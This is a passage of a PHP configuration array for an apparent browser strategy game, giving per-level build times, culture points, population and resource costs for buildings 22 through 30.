'resources' => array( '1' => 965, '2' => 1070, '3' => 1260, '4' => 670 )



'value' => 66, 'time_consume' => 6950, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 1235, '2' => 1370, '3' => 1610, '4' => 860 )



'value' => 59, 'time_consume' => 8360, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 1580, '2' => 1750, '3' => 2060, '4' => 1100 )



'value' => 53, 'time_consume' => 10000, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 2025, '2' => 2245, '3' => 2640, '4' => 1405 )



'value' => 48, 'time_consume' => 11900, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 2590, '2' => 2870, '3' => 3380, '4' => 1800 )



'value' => 43, 'time_consume' => 14110, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 3315, '2' => 3675, '3' => 4325, '4' => 2305 )



'value' => 39, 'time_consume' => 16660, 'cp' => 19, 'people_inc' => 2,

'resources' => array( '1' => 4245, '2' => 4705, '3' => 5535, '4' => 2950 )



'value' => 35, 'time_consume' => 19630, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 5430, '2' => 6020, '3' => 7085, '4' => 3780 )



'value' => 31, 'time_consume' => 23070, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 6950, '2' => 7705, '3' => 9065, '4' => 4835 )



'value' => 28, 'time_consume' => 27060, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 8900, '2' => 9865, '3' => 11605, '4' => 6190 )



'value' => 25, 'time_consume' => 31690, 'cp' => 39, 'people_inc' => 3,

'resources' => array( '1' => 11390, '2' => 12625, '3' => 14855, '4' => 7925 )



'value' => 23, 'time_consume' => 37060, 'cp' => 46, 'people_inc' => 3,

'resources' => array( '1' => 14580, '2' => 16165, '3' => 19015, '4' => 10140 )



'value' => 21, 'time_consume' => 43290, 'cp' => 55, 'people_inc' => 3,

'resources' => array( '1' => 18660, '2' => 20690, '3' => 24340, '4' => 12980 )



'value' => 19, 'time_consume' => 50520, 'cp' => 67, 'people_inc' => 3,

'resources' => array( '1' => 23885, '2' => 26480, '3' => 31155, '4' => 16615 )



'value' => 17, 'time_consume' => 58900, 'cp' => 80, 'people_inc' => 3,

'resources' => array( '1' => 30570, '2' => 33895, '3' => 39875, '4' => 21270 )



'value' => 15, 'time_consume' => 68630, 'cp' => 96, 'people_inc' => 3,

'resources' => array( '1' => 39130, '2' => 43385, '3' => 51040, '4' => 27225 )



'value' => 14, 'time_consume' => 79910, 'cp' => 115, 'people_inc' => 3,

'resources' => array( '1' => 50090, '2' => 55535, '3' => 65335, '4' => 34845 )




'22'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '19' => 3, '15' => 3 ),

'levels'=> array(


'value' => 0, 'time_consume' => 2000, 'cp' => 5, 'people_inc' => 4,

'resources' => array( '1' => 220, '2' => 160, '3' => 90, '4' => 40 )



'value' => 0, 'time_consume' => 2620, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 280, '2' => 205, '3' => 115, '4' => 50 )



'value' => 0, 'time_consume' => 3340, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 360, '2' => 260, '3' => 145, '4' => 65 )



'value' => 0, 'time_consume' => 4170, 'cp' => 8, 'people_inc' => 2,

'resources' => array( '1' => 460, '2' => 335, '3' => 190, '4' => 85 )



'value' => 0, 'time_consume' => 5140, 'cp' => 10, 'people_inc' => 2,

'resources' => array( '1' => 590, '2' => 430, '3' => 240, '4' => 105 )



'value' => 0, 'time_consume' => 6260, 'cp' => 12, 'people_inc' => 3,

'resources' => array( '1' => 755, '2' => 550, '3' => 310, '4' => 135 )



'value' => 0, 'time_consume' => 7570, 'cp' => 14, 'people_inc' => 3,

'resources' => array( '1' => 970, '2' => 705, '3' => 395, '4' => 175 )



'value' => 0, 'time_consume' => 9080, 'cp' => 17, 'people_inc' => 3,

'resources' => array( '1' => 1240, '2' => 900, '3' => 505, '4' => 225 )



'value' => 0, 'time_consume' => 10830, 'cp' => 21, 'people_inc' => 3,

'resources' => array( '1' => 1585, '2' => 1155, '3' => 650, '4' => 290 )



'value' => 0, 'time_consume' => 12860, 'cp' => 25, 'people_inc' => 3,

'resources' => array( '1' => 2030, '2' => 1475, '3' => 830, '4' => 370 )



'value' => 0, 'time_consume' => 15220, 'cp' => 30, 'people_inc' => 3,

'resources' => array( '1' => 2595, '2' => 1890, '3' => 1065, '4' => 470 )



'value' => 0, 'time_consume' => 17950, 'cp' => 36, 'people_inc' => 3,

'resources' => array( '1' => 3325, '2' => 2420, '3' => 1360, '4' => 605 )



'value' => 0, 'time_consume' => 21130, 'cp' => 43, 'people_inc' => 3,

'resources' => array( '1' => 4255, '2' => 3095, '3' => 1740, '4' => 775 )



'value' => 0, 'time_consume' => 24810, 'cp' => 51, 'people_inc' => 3,

'resources' => array( '1' => 5445, '2' => 3960, '3' => 2230, '4' => 990 )



'value' => 0, 'time_consume' => 29080, 'cp' => 62, 'people_inc' => 3,

'resources' => array( '1' => 6970, '2' => 5070, '3' => 2850, '4' => 1270 )



'value' => 0, 'time_consume' => 34030, 'cp' => 74, 'people_inc' => 4,

'resources' => array( '1' => 8925, '2' => 6490, '3' => 3650, '4' => 1625 )



'value' => 0, 'time_consume' => 39770, 'cp' => 89, 'people_inc' => 4,

'resources' => array( '1' => 11425, '2' => 8310, '3' => 4675, '4' => 2075 )



'value' => 0, 'time_consume' => 46440, 'cp' => 106, 'people_inc' => 4,

'resources' => array( '1' => 14620, '2' => 10635, '3' => 5980, '4' => 2660 )



'value' => 0, 'time_consume' => 54170, 'cp' => 127, 'people_inc' => 4,

'resources' => array( '1' => 18715, '2' => 13610, '3' => 7655, '4' => 3405 )



'value' => 0, 'time_consume' => 63130, 'cp' => 127, 'people_inc' => 4,

'resources' => array( '1' => 23955, '2' => 17420, '3' => 9800, '4' => 4355 )




'23'=> array (

'support_multiple' => TRUE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 2, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 100, 'time_consume' => 750, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 40, '2' => 50, '3' => 30, '4' => 10 )



'value' => 130, 'time_consume' => 1170, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 50, '2' => 65, '3' => 40, '4' => 15 )



'value' => 170, 'time_consume' => 1660, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 65, '2' => 80, '3' => 50, '4' => 15 )



'value' => 220, 'time_consume' => 2220, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 85, '2' => 105, '3' => 65, '4' => 20 )



'value' => 280, 'time_consume' => 2880, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 105, '2' => 135, '3' => 80, '4' => 25 )



'value' => 360, 'time_consume' => 3640, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 135, '2' => 170, '3' => 105, '4' => 35 )



'value' => 460, 'time_consume' => 4520, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 175, '2' => 220, '3' => 130, '4' => 45 )



'value' => 600, 'time_consume' => 5540, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 225, '2' => 280, '3' => 170, '4' => 55 )



'value' => 770, 'time_consume' => 6730, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 290, '2' => 360, '3' => 215, '4' => 70 )



'value' => 1000, 'time_consume' => 8110, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 370, '2' => 460, '3' => 275, '4' => 90 )




'24'=> array (

'celebrations'=> array (

'small'=> array ('level' => 1, 'value' => 500,'time_consume' => 86400, 'resources' => array( '1' => 6400, '2' => 6650, '3' => 5940, '4' => 1340 )),

'large'=> array ('level' => 10, 'value' => 2000,'time_consume' => 108000, 'resources' => array( '1' => 29700, '2' => 33250, '3' => 32000, '4' => 6700 ))


'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 10, '22' => 10 ),

'levels'=> array(


'value' => 0, 'time_consume' => 12500, 'cp' => 6, 'people_inc' => 4,

'resources' => array( '1' => 1250, '2' => 1110, '3' => 1260, '4' => 600 )



'value' => 0, 'time_consume' => 14800, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 1600, '2' => 1420, '3' => 1615, '4' => 770 )



'value' => 0, 'time_consume' => 17470, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 2050, '2' => 1820, '3' => 2065, '4' => 985 )



'value' => 0, 'time_consume' => 20560, 'cp' => 10, 'people_inc' => 2,

'resources' => array( '1' => 2620, '2' => 2330, '3' => 2640, '4' => 1260 )



'value' => 0, 'time_consume' => 24150, 'cp' => 12, 'people_inc' => 2,

'resources' => array( '1' => 3355, '2' => 2980, '3' => 3380, '4' => 1610 )



'value' => 0, 'time_consume' => 28320, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 4295, '2' => 3815, '3' => 4330, '4' => 2060 )



'value' => 0, 'time_consume' => 33150, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 5500, '2' => 4880, '3' => 5540, '4' => 2640 )



'value' => 0, 'time_consume' => 38750, 'cp' => 21, 'people_inc' => 3,

'resources' => array( '1' => 7035, '2' => 6250, '3' => 7095, '4' => 3380 )



'value' => 0, 'time_consume' => 45250, 'cp' => 26, 'people_inc' => 3,

'resources' => array( '1' => 9005, '2' => 8000, '3' => 9080, '4' => 4325 )



'value' => 0, 'time_consume' => 52790, 'cp' => 31, 'people_inc' => 3,

'resources' => array( '1' => 11530, '2' => 10240, '3' => 11620, '4' => 5535 )



'value' => 0, 'time_consume' => 61540, 'cp' => 37, 'people_inc' => 3,

'resources' => array( '1' => 14755, '2' => 13105, '3' => 14875, '4' => 7085 )



'value' => 0, 'time_consume' => 71690, 'cp' => 45, 'people_inc' => 3,

'resources' => array( '1' => 18890, '2' => 16775, '3' => 19040, '4' => 9065 )



'value' => 0, 'time_consume' => 83460, 'cp' => 53, 'people_inc' => 3,

'resources' => array( '1' => 24180, '2' => 21470, '3' => 24370, '4' => 11605 )



'value' => 0, 'time_consume' => 97110, 'cp' => 64, 'people_inc' => 3,

'resources' => array( '1' => 30950, '2' => 27480, '3' => 31195, '4' => 14855 )



'value' => 0, 'time_consume' => 112950, 'cp' => 77, 'people_inc' => 3,

'resources' => array( '1' => 39615, '2' => 35175, '3' => 39930, '4' => 19015 )



'value' => 0, 'time_consume' => 131320, 'cp' => 92, 'people_inc' => 4,

'resources' => array( '1' => 50705, '2' => 45025, '3' => 51110, '4' => 24340 )



'value' => 0, 'time_consume' => 152630, 'cp' => 111, 'people_inc' => 4,

'resources' => array( '1' => 64905, '2' => 57635, '3' => 65425, '4' => 31155 )



'value' => 0, 'time_consume' => 177350, 'cp' => 127, 'people_inc' => 4,

'resources' => array( '1' => 83075, '2' => 73770, '3' => 83740, '4' => 39875 )



'value' => 0, 'time_consume' => 206020, 'cp' => 127, 'people_inc' => 4,

'resources' => array( '1' => 106340, '2' => 94430, '3' => 107190, '4' => 51040 )



'value' => 0, 'time_consume' => 239290, 'cp' => 127, 'people_inc' => 4,

'resources' => array( '1' => 136115, '2' => 120870, '3' => 137200, '4' => 65335 )




'25'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 5, '26' => NULL ),

'levels'=> array(


'value' => 0, 'time_consume' => 2000, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 580, '2' => 460, '3' => 350, '4' => 180 )



'value' => 0, 'time_consume' => 2620, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 740, '2' => 590, '3' => 450, '4' => 230 )



'value' => 0, 'time_consume' => 3340, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 950, '2' => 755, '3' => 575, '4' => 295 )



'value' => 0, 'time_consume' => 4170, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 1215, '2' => 965, '3' => 735, '4' => 375 )



'value' => 0, 'time_consume' => 5140, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 1555, '2' => 1235, '3' => 940, '4' => 485 )



'value' => 0, 'time_consume' => 6260, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 1995, '2' => 1580, '3' => 1205, '4' => 620 )



'value' => 0, 'time_consume' => 7570, 'cp' => 7, 'people_inc' => 1,

'resources' => array( '1' => 2550, '2' => 2025, '3' => 1540, '4' => 790 )



'value' => 0, 'time_consume' => 9080, 'cp' => 9, 'people_inc' => 1,

'resources' => array( '1' => 3265, '2' => 2590, '3' => 1970, '4' => 1015 )



'value' => 0, 'time_consume' => 10830, 'cp' => 10, 'people_inc' => 1,

'resources' => array( '1' => 4180, '2' => 3315, '3' => 2520, '4' => 1295 )



'value' => 1, 'time_consume' => 12860, 'cp' => 12, 'people_inc' => 1,

'resources' => array( '1' => 5350, '2' => 4245, '3' => 3230, '4' => 1660 )



'value' => 1, 'time_consume' => 15220, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 6845, '2' => 5430, '3' => 4130, '4' => 2125 )



'value' => 1, 'time_consume' => 17950, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 8765, '2' => 6950, '3' => 5290, '4' => 2720 )



'value' => 1, 'time_consume' => 21130, 'cp' => 21, 'people_inc' => 2,

'resources' => array( '1' => 11220, '2' => 8900, '3' => 6770, '4' => 3480 )



'value' => 1, 'time_consume' => 24810, 'cp' => 26, 'people_inc' => 2,

'resources' => array( '1' => 14360, '2' => 11390, '3' => 8665, '4' => 4455 )



'value' => 1, 'time_consume' => 29080, 'cp' => 31, 'people_inc' => 2,

'resources' => array( '1' => 18380, '2' => 14580, '3' => 11090, '4' => 5705 )



'value' => 1, 'time_consume' => 34030, 'cp' => 37, 'people_inc' => 2,

'resources' => array( '1' => 23530, '2' => 18660, '3' => 14200, '4' => 7300 )



'value' => 1, 'time_consume' => 39770, 'cp' => 44, 'people_inc' => 2,

'resources' => array( '1' => 30115, '2' => 23885, '3' => 18175, '4' => 9345 )



'value' => 1, 'time_consume' => 46440, 'cp' => 53, 'people_inc' => 2,

'resources' => array( '1' => 38550, '2' => 30570, '3' => 23260, '4' => 11965 )



'value' => 1, 'time_consume' => 54170, 'cp' => 64, 'people_inc' => 2,

'resources' => array( '1' => 49340, '2' => 39130, '3' => 29775, '4' => 15315 )



'value' => 2, 'time_consume' => 63130, 'cp' => 77, 'people_inc' => 2,

'resources' => array( '1' => 63155, '2' => 50090, '3' => 38110, '4' => 19600 )




'26'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '18' => 1, '15' => 5, '25' => NULL ),

'levels'=> array(


'value' => 0, 'time_consume' => 5000, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 550, '2' => 800, '3' => 750, '4' => 250 )



'value' => 0, 'time_consume' => 6100, 'cp' => 7, 'people_inc' => 1,

'resources' => array( '1' => 705, '2' => 1025, '3' => 960, '4' => 320 )



'value' => 0, 'time_consume' => 7380, 'cp' => 9, 'people_inc' => 1,

'resources' => array( '1' => 900, '2' => 1310, '3' => 1230, '4' => 410 )



'value' => 0, 'time_consume' => 8860, 'cp' => 10, 'people_inc' => 1,

'resources' => array( '1' => 1155, '2' => 1680, '3' => 1575, '4' => 525 )



'value' => 0, 'time_consume' => 10570, 'cp' => 12, 'people_inc' => 1,

'resources' => array( '1' => 1475, '2' => 2145, '3' => 2015, '4' => 670 )



'value' => 0, 'time_consume' => 12560, 'cp' => 15, 'people_inc' => 1,

'resources' => array( '1' => 1890, '2' => 2750, '3' => 2575, '4' => 860 )



'value' => 0, 'time_consume' => 14880, 'cp' => 18, 'people_inc' => 1,

'resources' => array( '1' => 2420, '2' => 3520, '3' => 3300, '4' => 1100 )



'value' => 0, 'time_consume' => 17560, 'cp' => 21, 'people_inc' => 1,

'resources' => array( '1' => 3095, '2' => 4505, '3' => 4220, '4' => 1405 )



'value' => 0, 'time_consume' => 20660, 'cp' => 26, 'people_inc' => 1,

'resources' => array( '1' => 3965, '2' => 5765, '3' => 5405, '4' => 1800 )



'value' => 0, 'time_consume' => 24270, 'cp' => 31, 'people_inc' => 1,

'resources' => array( '1' => 5075, '2' => 7380, '3' => 6920, '4' => 2305 )



'value' => 0, 'time_consume' => 28450, 'cp' => 37, 'people_inc' => 2,

'resources' => array( '1' => 6495, '2' => 9445, '3' => 8855, '4' => 2950 )



'value' => 0, 'time_consume' => 33310, 'cp' => 45, 'people_inc' => 2,

'resources' => array( '1' => 8310, '2' => 12090, '3' => 11335, '4' => 3780 )



'value' => 0, 'time_consume' => 38940, 'cp' => 53, 'people_inc' => 2,

'resources' => array( '1' => 10640, '2' => 15475, '3' => 14505, '4' => 4835 )



'value' => 0, 'time_consume' => 45460, 'cp' => 64, 'people_inc' => 2,

'resources' => array( '1' => 13615, '2' => 19805, '3' => 18570, '4' => 6190 )



'value' => 0, 'time_consume' => 53040, 'cp' => 77, 'people_inc' => 2,

'resources' => array( '1' => 17430, '2' => 25355, '3' => 23770, '4' => 7925 )



'value' => 0, 'time_consume' => 61830, 'cp' => 92, 'people_inc' => 2,

'resources' => array( '1' => 22310, '2' => 32450, '3' => 30425, '4' => 10140 )



'value' => 0, 'time_consume' => 72020, 'cp' => 111, 'people_inc' => 2,

'resources' => array( '1' => 28560, '2' => 41540, '3' => 38940, '4' => 12980 )



'value' => 0, 'time_consume' => 83840, 'cp' => 127, 'people_inc' => 2,

'resources' => array( '1' => 36555, '2' => 53170, '3' => 49845, '4' => 16615 )



'value' => 0, 'time_consume' => 97550, 'cp' => 127, 'people_inc' => 2,

'resources' => array( '1' => 46790, '2' => 68055, '3' => 63805, '4' => 21270 )



'value' => 0, 'time_consume' => 113460, 'cp' => 127, 'people_inc' => 2,

'resources' => array( '1' => 59890, '2' => 87110, '3' => 81670, '4' => 27225 )





'27'=> array (

'support_multiple' => FALSE, 'built_in_capital' => FALSE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 10, '40' => NULL ),

'levels'=> array(


'value' => 0, 'time_consume' => 8000, 'cp' => 10, 'people_inc' => 4,

'resources' => array( '1' => 2880, '2' => 2740, '3' => 2580, '4' => 990 )



'value' => 0, 'time_consume' => 9580, 'cp' => 12, 'people_inc' => 2,

'resources' => array( '1' => 3685, '2' => 3505, '3' => 3300, '4' => 1265 )



'value' => 0, 'time_consume' => 11410, 'cp' => 14, 'people_inc' => 2,

'resources' => array( '1' => 4720, '2' => 4490, '3' => 4225, '4' => 1620 )



'value' => 0, 'time_consume' => 13540, 'cp' => 17, 'people_inc' => 2,

'resources' => array( '1' => 6040, '2' => 5745, '3' => 5410, '4' => 2075 )



'value' => 0, 'time_consume' => 16010, 'cp' => 20, 'people_inc' => 2,

'resources' => array( '1' => 7730, '2' => 7355, '3' => 6925, '4' => 2660 )



'value' => 0, 'time_consume' => 18870, 'cp' => 24, 'people_inc' => 3,

'resources' => array( '1' => 9895, '2' => 9415, '3' => 8865, '4' => 3400 )



'value' => 0, 'time_consume' => 22180, 'cp' => 29, 'people_inc' => 3,

'resources' => array( '1' => 12665, '2' => 12050, '3' => 11345, '4' => 4355 )



'value' => 0, 'time_consume' => 26030, 'cp' => 34, 'people_inc' => 3,

'resources' => array( '1' => 16215, '2' => 15425, '3' => 14525, '4' => 5575 )



'value' => 0, 'time_consume' => 30500, 'cp' => 41, 'people_inc' => 3,

'resources' => array( '1' => 20755, '2' => 19745, '3' => 18590, '4' => 7135 )



'value' => 1, 'time_consume' => 35680, 'cp' => 50, 'people_inc' => 3,

'resources' => array( '1' => 26565, '2' => 25270, '3' => 23795, '4' => 9130 )





'28'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '17' => 20, '20' => 10 ),

'levels'=> array(


'value' => 110, 'time_consume' => 3000, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 1400, '2' => 1330, '3' => 1200, '4' => 400 )



'value' => 120, 'time_consume' => 3780, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 1790, '2' => 1700, '3' => 1535, '4' => 510 )



'value' => 130, 'time_consume' => 4680, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 2295, '2' => 2180, '3' => 1965, '4' => 655 )



'value' => 140, 'time_consume' => 5730, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 2935, '2' => 2790, '3' => 2515, '4' => 840 )



'value' => 150, 'time_consume' => 6950, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 3760, '2' => 3570, '3' => 3220, '4' => 1075 )



'value' => 160, 'time_consume' => 8360, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 4810, '2' => 4570, '3' => 4125, '4' => 1375 )



'value' => 170, 'time_consume' => 10000, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 6155, '2' => 5850, '3' => 5280, '4' => 1760 )



'value' => 180, 'time_consume' => 11900, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 7880, '2' => 7485, '3' => 6755, '4' => 2250 )



'value' => 190, 'time_consume' => 14110, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 10090, '2' => 9585, '3' => 8645, '4' => 2880 )



'value' => 200, 'time_consume' => 16660, 'cp' => 19, 'people_inc' => 2,

'resources' => array( '1' => 12915, '2' => 12265, '3' => 11070, '4' => 3690 )



'value' => 210, 'time_consume' => 19630, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 16530, '2' => 15700, '3' => 14165, '4' => 4720 )



'value' => 220, 'time_consume' => 23070, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 21155, '2' => 20100, '3' => 18135, '4' => 6045 )



'value' => 230, 'time_consume' => 27060, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 27080, '2' => 25725, '3' => 23210, '4' => 7735 )



'value' => 240, 'time_consume' => 31690, 'cp' => 39, 'people_inc' => 3,

'resources' => array( '1' => 34660, '2' => 32930, '3' => 29710, '4' => 9905 )



'value' => 250, 'time_consume' => 37060, 'cp' => 46, 'people_inc' => 3,

'resources' => array( '1' => 44370, '2' => 42150, '3' => 38030, '4' => 12675 )



'value' => 260, 'time_consume' => 43290, 'cp' => 55, 'people_inc' => 3,

'resources' => array( '1' => 56790, '2' => 53950, '3' => 48680, '4' => 16225 )



'value' => 270, 'time_consume' => 50520, 'cp' => 67, 'people_inc' => 3,

'resources' => array( '1' => 72690, '2' => 69060, '3' => 62310, '4' => 20770 )



'value' => 280, 'time_consume' => 58900, 'cp' => 80, 'people_inc' => 3,

'resources' => array( '1' => 93045, '2' => 88395, '3' => 79755, '4' => 26585 )



'value' => 290, 'time_consume' => 68630, 'cp' => 96, 'people_inc' => 3,

'resources' => array( '1' => 119100, '2' => 113145, '3' => 102085, '4' => 34030 )



'value' => 300, 'time_consume' => 79910, 'cp' => 115, 'people_inc' => 3,

'resources' => array( '1' => 152445, '2' => 144825, '3' => 130670, '4' => 43555 )




'29'=> array (

'support_multiple' => FALSE, 'built_in_capital' => FALSE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 3, '2' => 3, '3' => 3, '4' => 3, '6' => 3, '7' => 3 ),

'pre_requests' => array( '19' => 20 ),

'levels'=> array(


'value' => 100, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 4,

'resources' => array( '1' => 630, '2' => 420, '3' => 780, '4' => 360 )



'value' => 90, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 805, '2' => 540, '3' => 1000, '4' => 460 )



'value' => 81, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 1030, '2' => 690, '3' => 1280, '4' => 590 )



'value' => 73, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 1320, '2' => 880, '3' => 1635, '4' => 755 )



'value' => 66, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 1690, '2' => 1125, '3' => 2095, '4' => 965 )



'value' => 59, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 2165, '2' => 1445, '3' => 2680, '4' => 1235 )



'value' => 53, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 2770, '2' => 1845, '3' => 3430, '4' => 1585 )



'value' => 48, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 3545, '2' => 2365, '3' => 4390, '4' => 2025 )



'value' => 43, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 4540, '2' => 3025, '3' => 5620, '4' => 2595 )



'value' => 39, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 5810, '2' => 3875, '3' => 7195, '4' => 3320 )



'value' => 35, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 7440, '2' => 4960, '3' => 9210, '4' => 4250 )



'value' => 31, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 9520, '2' => 6345, '3' => 11785, '4' => 5440 )



'value' => 28, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 12185, '2' => 8125, '3' => 15085, '4' => 6965 )



'value' => 25, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 15600, '2' => 10400, '3' => 19310, '4' => 8915 )



'value' => 23, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 19965, '2' => 13310, '3' => 24720, '4' => 11410 )



'value' => 21, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 4,

'resources' => array( '1' => 25555, '2' => 17035, '3' => 31640, '4' => 14605 )



'value' => 19, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 4,

'resources' => array( '1' => 32710, '2' => 21810, '3' => 40500, '4' => 18690 )



'value' => 17, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 4,

'resources' => array( '1' => 41870, '2' => 27915, '3' => 51840, '4' => 23925 )



'value' => 15, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 4,

'resources' => array( '1' => 53595, '2' => 35730, '3' => 66355, '4' => 30625 )



'value' => 14, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 4,

'resources' => array( '1' => 68600, '2' => 45735, '3' => 84935, '4' => 39200 )




'30'=> array (

'support_multiple' => FALSE, 'built_in_capital' => FALSE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 3, '2' => 3, '3' => 3, '4' => 3, '6' => 3, '7' => 3 ),

'pre_requests' => array( '20' => 20 ),

'levels'=> array(


'value' => 100, 'time_consume' => 2200, 'cp' => 2, 'people_inc' => 5,

'resources' => array( '1' => 780, '2' => 420, '3' => 660, '4' => 300 )



'value' => 90, 'time_consume' => 2850, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 1000, '2' => 540, '3' => 845, '4' => 385 )



'value' => 81, 'time_consume' => 3610, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 1280, '2' => 690, '3' => 1080, '4' => 490 )



'value' => 73, 'time_consume' => 4490, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 1635, '2' => 880, '3' => 1385, '4' => 630 )



'value' => 66, 'time_consume' => 5500, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 2095, '2' => 1125, '3' => 1770, '4' => 805 )



'value' => 59, 'time_consume' => 6680, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 2680, '2' => 1445, '3' => 2270, '4' => 1030 )



'value' => 53, 'time_consume' => 8050, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 3430, '2' => 1845, '3' => 2905, '4' => 1320 )



'value' => 48, 'time_consume' => 9640, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 4390, '2' => 2365, '3' => 3715, '4' => 1690 )



